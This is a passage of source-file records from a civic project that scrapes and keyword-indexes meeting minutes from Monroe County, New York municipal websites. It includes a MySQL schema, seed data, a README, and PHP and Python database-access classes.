null,\nscrapeurlid int not null,\nforeign key (scrapeurlid) references scrapeurls(scrapeurlid)\n);\n\ncreate table documents(\ndocumentid int not null auto_increment primary key,\nsuborganizationid int not null,\nforeign key (suborganizationid) references suborganizations(suborganizationid),\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nsourceurl text not null,\ndocumentdate date not null,\nscrapedate date not null,\nname text not null,\ndochash text not null,\norphaned bool not null\n);\n\ncreate table documenttexts(\ndocumenttextid int not null auto_increment primary key,\ndocumentid int not null,\nforeign key (documentid) references documents(documentid),\ndocumenttext text not null\n);\n\ncreate table words(\nwordid int not null auto_increment primary key,\ndocumentid int not null,\nforeign key (documentid) references documents(documentid),\nsuborganizationid int not null,\nforeign key (suborganizationid) references suborganizations(suborganizationid),\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nword varchar(127) not null,\nfrequency int not null\n);\n\ncreate table searches(\nsearchid int not null auto_increment primary key,\nsearchterm varchar(255) not null,\nsearchdt datetime not null,\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid)\n);\n\ncreate table runs(\nrunid int not null auto_increment primary key,\nrundt datetime not null,\nscrapername text not null,\nsuccessful bool not null,\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nsuborganizationid int not null,\nforeign key (suborganizationid) references suborganizations(suborganizationid)\n);\n\nINSERT INTO organizations VALUES\n(1,'Brighton','town',''),\n(2,'Brockport','village',''),\n(3,'Chili','town',''),\n(4,'Churchville','village',''),\n(5,'Clarkson','town',''),\n(6,'East Rochester','village/town',''),\n(7,'Fairport','village',''),\n(8,'Gates','town',''),\n(9,'Greece','town',''),\n(10,'Hamlin','town',''),\n(11,'Henrietta','town',''),\n(12,'Hilton','village',''),\n(13,'Honeoye Falls','village',''),\n(14,'Irondequoit','town',''),\n(15,'Mendon','town',''),\n(16,'Ogden','town',''),\n(17,'Parma','town',''),\n(18,'Penfield','town',''),\n(19,'Perinton','town',''),\n(20,'Pittsford','town',''),\n(22,'Riga','town',''),\n(23,'Rochester','city',''),\n(24,'Rush','town',''),\n(25,'Scottsville','village',''),\n(26,'Spencerport','village',''),\n(27,'Sweden','town',''),\n(28,'Webster','town',''),\n(29,'Webster','village',''),\n(30,'Wheatland','town',''),\n(31,'Monroe County','County','');\n\nINSERT INTO suborganizations VALUES \n(1,1,'Town of Brighton','','http://www.townofbrighton.org/','http://www.townofbrighton.org/index.aspx?nid=78','simpledifscript',0),\n(2,2,'Village of Brockport','','http://www.brockportny.org/','http://www.brockportny.org/html/government/minutes.html','simpledifscript',0),\n(3,3,'Town of Chili','','http://www.townofchili.org/','http://www.townofchili.org/index.php?option=com_docman&task=cat_view&gid=322&Itemid=52','simpledifscript',0),\n(4,5,'Town of Clarkson','','http://www.clarksonny.org/','http://www.clarksonny.org/html/minutes.html','simpledifscript',0),\n(5,4,'Town of Churchville','','http://www.churchville.net/','','simpledifscript',0),\n(6,6,'Town of East Rochester','','http://eastrochester.org/','http://eastrochester.org/government/board/content/documents/','simpledifscript',0),\n(7,7,'Village of Fairport','','http://www.village.fairport.ny.us/','http://ecode360.com//documents/list/FA0327/quick?CFID=7998379&CFTOKEN=27833541#sub62893','simpledifscript',0),\n(8,8,'Town of Gates','','http://www.townofgates.org/','http://www.townofgates.org/index.php?option=com_content&view=article&id=66&Itemid=87','simpledifscript',0),\n(9,9,'Town of Greece','','http://greeceny.gov/','http://greeceny.gov/board-meetings-past','simpledifscript',0),\n(10,10,'Town of Hamlin','','http://www.hamlinny.org/','http://www.hamlinny.org/Town_Board/index.html#minutes','simpledifscript',0),\n(11,12,'Village of Hilton','','http://www.hiltonny.org/','http://www.hiltonny.org/html/trustees.html','simpledifscript',0),\n(12,13,'Village of Honeoye Falls','','http://www.villageofhoneoyefalls.org/','http://www.villageofhoneoyefalls.org/archive_minutes.php','simpledifscript',0),\n(13,16,'Town of Ogden','','http://www.ogdenny.com','http://www.ecode360.com/documents/list/OG0089/quick/-5','simpledifscript',0),\n(14,17,'Town of Parma','','http://www.parmany.org/','http://www.parmany.org/Town-Boards/','simpledifscript',0),\n(15,18,'Town of Penfield','','http://www.penfield.org/','http://www.penfield.org/index.php?pr=Town_Board_Agendas','simpledifscript',0),\n(16,19,'Town of Perinton','','http://www.perinton.org/','http://www.perinton.org/Boards/TwnBrd/twnbdAgd/','simpledifscript',0),\n(17,20,'Town of Pitsford','','http://townofpittsford.org/','http://townofpittsford.org/home-tbminutes','simpledifscript',0);\n\n\n"
},
{
"alpha_fraction": 0.650580883026123,
"alphanum_fraction": 0.6621983647346497,
"avg_line_length": 28.3157901763916,
"blob_id": "d587d01e69615761cc0eed5ad49f182d256a2035",
"content_id": "a6ab86c3d26d1508b1cc2c05d324decdf9487ecd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 373,
"num_lines": 38,
"path": "/README.md",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "monroeminutes.org\n=================\n\nTools and Technologies\n----------------------\n\nThe site is built on Python scrapers, and PHP web back-end interfacing to a MySQL database.\n\nThe base classes for both the python and the PHP were generated from SQL via sql2api ( http://github.com/thequbit/sql2api ).\n\n\nOverview\n--------\n\nMonroeMinutes, and thus monroeminutes.org, is a document agrigator and indexer. The tools scrape websites within Monroe County and pull meeting minutes and other important documents from various village, town, city, and county websites. These are then indexed using a histogram method with keyword rejection (black list of words that are too common to include in search).\n\nThe data is setup in the following way:\n\n\t|-> Organization 0\n\t\t|-> Sub Organization 0\n\t\t\t|-> Document 0\n\t\t\t\t|-> <token data>\n\t\t\t|-> Document 1\n\t\t\t\t|-> <token data>\n\t\t\t|-> Document 2\n\t\t\t\t\t|-> <token data>\n\t\n\t\t|-> Sub Organization 1\n\t\t\t|-> Document 0\n\t\t\t\t|-> <token data>\n\t\n\t|-> Organization 1\n\t\t|-> Sub Organization 0\n\t\t\t|-> Document 0\n\t\t\t\t|-> <token data>\n\t\t\t\t|-> <token data>\n\t\t\t|-> Document 1\n\t\t\t\t|-> <token data>\n\t\t\t\t\n"
},
{
"alpha_fraction": 0.6063268780708313,
"alphanum_fraction": 0.606829047203064,
"avg_line_length": 31.120967864990234,
"blob_id": "f41ff31fda6fccbb911ac122116cd0b2cdc59b88",
"content_id": "cab6b6813d12773b33db73dd321f17f204182bb9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3983,
"license_type": "no_license",
"max_line_length": 348,
"num_lines": 124,
"path": "/web/tools/DocumentsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass DocumentsManager\n\t{\n\t\tfunction add($suborganizationid,$organizationid,$sourceurl,$documentdate,$scrapedate,$name,$dochash,$orphaned)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO documents(suborganizationid,organizationid,sourceurl,documentdate,scrapedate,name,dochash,orphaned) VALUES(?,?,?,?,?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssssssss\", $suborganizationid,$organizationid,$sourceurl,$documentdate,$scrapedate,$name,$dochash,$orphaned);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'sourceurl' => $row['sourceurl'],'documentdate' => $row['documentdate'],'scrapedate' => $row['scrapedate'],'name' => $row['name'],'dochash' => $row['dochash'],'orphaned' => $row['orphaned']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($documentid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documents WHERE documentid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documentid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'sourceurl' => $row['sourceurl'],'documentdate' => $row['documentdate'],'scrapedate' => $row['scrapedate'],'name' => $row['name'],'dochash' => $row['dochash'],'orphaned' => $row['orphaned']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documents';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'sourceurl' => $row['sourceurl'],'documentdate' => $row['documentdate'],'scrapedate' => $row['scrapedate'],'name' => $row['name'],'dochash' => $row['dochash'],'orphaned' => $row['orphaned']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($documentid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM documents WHERE documentid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documentid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($suborganizationid,$organizationid,$sourceurl,$documentdate,$scrapedate,$name,$dochash,$orphaned)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE documents SET suborganizationid = ?,organizationid = ?,sourceurl = ?,documentdate = ?,scrapedate = ?,name = ?,dochash = ?,orphaned = ? WHERE documentid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssssssss\", $suborganizationid,$organizationid,$sourceurl,$documentdate,$scrapedate,$name,$dochash,$orphaned, $documentid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.6052287817001343,
"alphanum_fraction": 0.6058823466300964,
"avg_line_length": 38.74026107788086,
"blob_id": "5d297fa38edbc7aebfee428c9718724909c8fa9f",
"content_id": "567bb32922ee41cad483a0cc8c13035fa92643f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3060,
"license_type": "no_license",
"max_line_length": 428,
"num_lines": 77,
"path": "/scripts/suborganizations.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import MySQLdb as mdb\nimport _mysql as mysql\nimport re\n\nclass suborganizations:\n\n __settings = {}\n __con = False\n\n def __init__(self):\n configfile = \"sqlcreds.txt\"\n f = open(configfile)\n for line in f:\n # skip comment lines\n m = re.search('^\\s*#', line)\n if m:\n continue\n\n # parse key=value lines\n m = re.search('^(\\w+)\\s*=\\s*(\\S.*)$', line)\n if m is None:\n continue\n\n self.__settings[m.group(1)] = m.group(2)\n f.close()\n\n # create connection\n self.__con = mdb.connect(host=self.__settings['host'], user=self.__settings['username'], passwd=self.__settings['password'], db=self.__settings['database'])\n\n def __sanitize(self,valuein):\n if type(valuein) == 'str':\n valueout = mysql.escape_string(valuein)\n else:\n valueout = valuein\n return valuein\n\n def add(self,organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"INSERT INTO suborganizations(organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated) VALUES(%s,%s,%s,%s,%s,%s,%s)\",(self.__sanitize(organizationid),self.__sanitize(name),self.__sanitize(parsename),self.__sanitize(websiteurl),self.__sanitize(documentsurl),self.__sanitize(scriptname),self.__sanitize(dbpopulated)))\n cur.close()\n newid = cur.lastrowid\n return newid\n\n def get(self,suborganizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM suborganizations WHERE suborganizationid = %s\",(suborganizationid))\n row = cur.fetchone()\n cur.close()\n\n def getall(self):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM suborganizations\")\n rows = cur.fetchall()\n cur.close()\n\n _suborganizations = []\n for row in rows:\n _suborganizations.append(row)\n\n return _suborganizations\n\n def delete(self,suborganizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"DELETE FROM suborganizations WHERE suborganizationid = %s\",(suborganizationid))\n cur.close()\n\n def update(self,suborganizationid,organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"UPDATE suborganizations SET organizationid = %s,name = %s,parsename = %s,websiteurl = %s,documentsurl = %s,scriptname = %s,dbpopulated = %s WHERE suborganizationid = %s\",(self.__sanitize(organizationid),self.__sanitize(name),self.__sanitize(parsename),self.__sanitize(websiteurl),self.__sanitize(documentsurl),self.__sanitize(scriptname),self.__sanitize(dbpopulated),self.__sanitize(suborganizationid)))\n cur.close()\n\n##### Application Specific Functions #####\n"
},
{
"alpha_fraction": 0.5303197503089905,
"alphanum_fraction": 0.5303197503089905,
"avg_line_length": 18.7391300201416,
"blob_id": "4d30f2e4f7a077abd0ba41b974df724d49618cfd",
"content_id": "c09fe15c1b85baaec7fe078ca862ca108e26a592",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 907,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 46,
"path": "/web/tools/old/OrganizationManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass OrganizationManager\n\t{\n\t\tfunction GetAllOrganizations()\n\t\t{\n\t\t\tdprint( \"GetAllOrganizations() Start.\" );\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool();\n\t\t\t\n\t\t\t\t$query = 'SELECT * from organizations';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t//$stmt->bind_param(\"s\", $albumid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$organizations = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$organization = (object) array( 'id' => $row['organizationid'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'name' => $row['name'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'type' => $row['type']\n\t\t\t\t\t\t\t\t\t\t\t\t );\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t$organizations[] = $organization;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\t\n\t\t\tdprint(\"GetAllOrganizations() Done.\");\n\t\t\t\n\t\t\treturn $organizations;\n\t\t}\n\t\n\t}\n\t\n?>"
},
{
"alpha_fraction": 0.5705843567848206,
"alphanum_fraction": 0.5712409615516663,
"avg_line_length": 23.564516067504883,
"blob_id": "a83ff7a4d8ab31571d54a0b3d69afa3c6538cbea",
"content_id": "df81732e4a0b8cbe2356dbbbc7728368c2266799",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3046,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 124,
"path": "/web/tools/SearchesManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass SearchesManager\n\t{\n\t\tfunction add($searchterm,$searchdt,$organizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO searches(searchterm,searchdt,organizationid) VALUES(?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $searchterm,$searchdt,$organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('searchid' => $row['searchid'],'searchterm' => $row['searchterm'],'searchdt' => $row['searchdt'],'organizationid' => $row['organizationid']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($searchid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM searches WHERE searchid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $searchid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('searchid' => $row['searchid'],'searchterm' => $row['searchterm'],'searchdt' => $row['searchdt'],'organizationid' => $row['organizationid']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM searches';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('searchid' => $row['searchid'],'searchterm' => $row['searchterm'],'searchdt' => $row['searchdt'],'organizationid' => $row['organizationid']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($searchid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM searches WHERE searchid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $searchid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($searchterm,$searchdt,$organizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE searches SET searchterm = ?,searchdt = ?,organizationid = ? WHERE searchid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssss\", $searchterm,$searchdt,$organizationid, $searchid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.5802794098854065,
"alphanum_fraction": 0.5827090740203857,
"avg_line_length": 26.28729248046875,
"blob_id": "71637e2a4e9dbcc5c916918044c3a9a8c1ae1a34",
"content_id": "173ad7537058e7a28dac12b7e59502415da68bc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4939,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 181,
"path": "/web/tools/WordsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass WordsManager\n\t{\n\t\tfunction add($documentid,$suborganizationid,$organizationid,$word,$frequency)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO words(documentid,suborganizationid,organizationid,word,frequency) VALUES(?,?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssss\", $documentid,$suborganizationid,$organizationid,$word,$frequency);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('wordid' => $row['wordid'],'documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'word' => $row['word'],'frequency' => $row['frequency']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($wordid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM words WHERE wordid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $wordid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('wordid' => $row['wordid'],'documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'word' => $row['word'],'frequency' => $row['frequency']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM words';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('wordid' => $row['wordid'],'documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'word' => $row['word'],'frequency' => $row['frequency']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($wordid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM words WHERE wordid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $wordid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($documentid,$suborganizationid,$organizationid,$word,$frequency)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE words SET documentid = ?,suborganizationid = ?,organizationid = ?,word = ?,frequency = ? WHERE wordid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssssss\", $documentid,$suborganizationid,$organizationid,$word,$frequency, $wordid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t\tfunction search($organizationid,$keyword,$page)\n\t\t{\n\t\t try\n\t\t\t{\n\t\t\t\t// decode offset based on page assuming 10 items / page\n\t\t\t\tif( $page > 1 )\n\t\t\t\t\t$limit = intval( ($page-1) * 10 );\n\t\t\t\telse\n\t\t\t\t\t$limit = 0;\n\t\t\t\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT word,documentid,suborganizationid,frequency FROM words WHERE organizationid = ? AND word = ? ORDER BY frequency DESC LIMIT 10 OFFSET ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\",$organizationid, $keyword, $limit);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('word' => $row['word'], 'documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'frequency' => $row['frequency']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\t\t\n\t\tfunction getcount($organizationid,$keyword)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT count(wordid) as count FROM words WHERE organizationid = ? and word = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ss\",$organizationid, $keyword);\n\t\t\t\t$results = $db->Execute($stmt);\n\n\t\t\t\t$count = $results[0]['count'];\n\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\n\t\t\treturn $count;\n\t\t}\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.5045871734619141,
"alphanum_fraction": 0.5045871734619141,
"avg_line_length": 11,
"blob_id": "e7fbc0fdfb3660392c10e918a1f2a0bc102ee9f8",
"content_id": "c057990ddb82eaa71387b69bddaf1eac37356ffb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 109,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/web/admin/admin.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
